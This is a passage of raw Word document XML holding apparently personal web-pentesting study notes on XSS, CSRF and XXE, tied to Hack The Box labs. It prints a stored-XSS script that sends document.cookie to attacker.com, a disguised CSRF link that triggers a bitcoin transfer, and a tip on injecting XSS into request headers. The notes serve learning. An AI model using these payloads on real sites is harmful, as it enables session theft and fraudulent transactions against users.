    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Plays Out in a Real Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. You insert the malicious script into a comment box:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  fetch('https://attacker.com?cookie=' + document.cookie);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. A victim logs into the website and visits the page containing your comment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Their browser automatically executes the script because the website didn't sanitize or filter the input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. The victim's cookies (which may include their session token) are sent to https://attacker.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. On the attacker's server, the cookies are logged, allowing the attacker to impersonate the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One strategy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is that if it detects XSS in the main user input, but then it display content of the request header (ex. URL, user-agent, Accept), then we can intercept the request via BurpSuite, and inject XSS into the any of the request headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was practiced in the Headless HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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BF6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nsq519jszunu" w:id="386"/>
      <w:bookmarkEnd w:id="386"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF (Cross-Site-Request-Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the XXXXXXXXX Book:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFB">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A CSRF attack occurs via social engineering in which the victim clicks on a malicious link that performs a preconfigured action on behalf of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The malicious link could be disguised by an apparently harmless description, often luring the victim to click on it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a href="http://fakecryptobank.com/send_btc?account=ATTACKER&amp;amount=100000""&gt;Check out these awesome cat memes!&lt;/a&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the above example, the URL link is pointing to a Fake Crypto Bank website API, which performs a bitcoin transfer to the attacker account. If this link was embedded into the HTML code of an email, the user would be only able to see the link description, but not the actual HTTP resource it is pointing to. This attack would be successful if the user is already logged in with a valid session on the same website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0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04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C05">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8unuhmwyqzq2" w:id="387"/>
      <w:bookmarkEnd w:id="387"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE (XML External Entity)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practiced on the Markup Tier 2 Starting point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId935">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">In-depth guide can be found on HackTricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId936">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Portswigger XXE Lab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XML:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XML is a markup language designed for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data storage and transport</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some simple XML code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;to&gt;Alice&lt;/to&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;from&gt;Bob&lt;/from&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;message&gt;Hello, this is a test XML document!&lt;/message&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;date&gt;2024-11-20&lt;/date&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Declares that this is an XML document and specifies the version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Element &lt;note&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All XML documents must have one root element that contains everything.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Child Elements</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1E">
      <w:pPr>
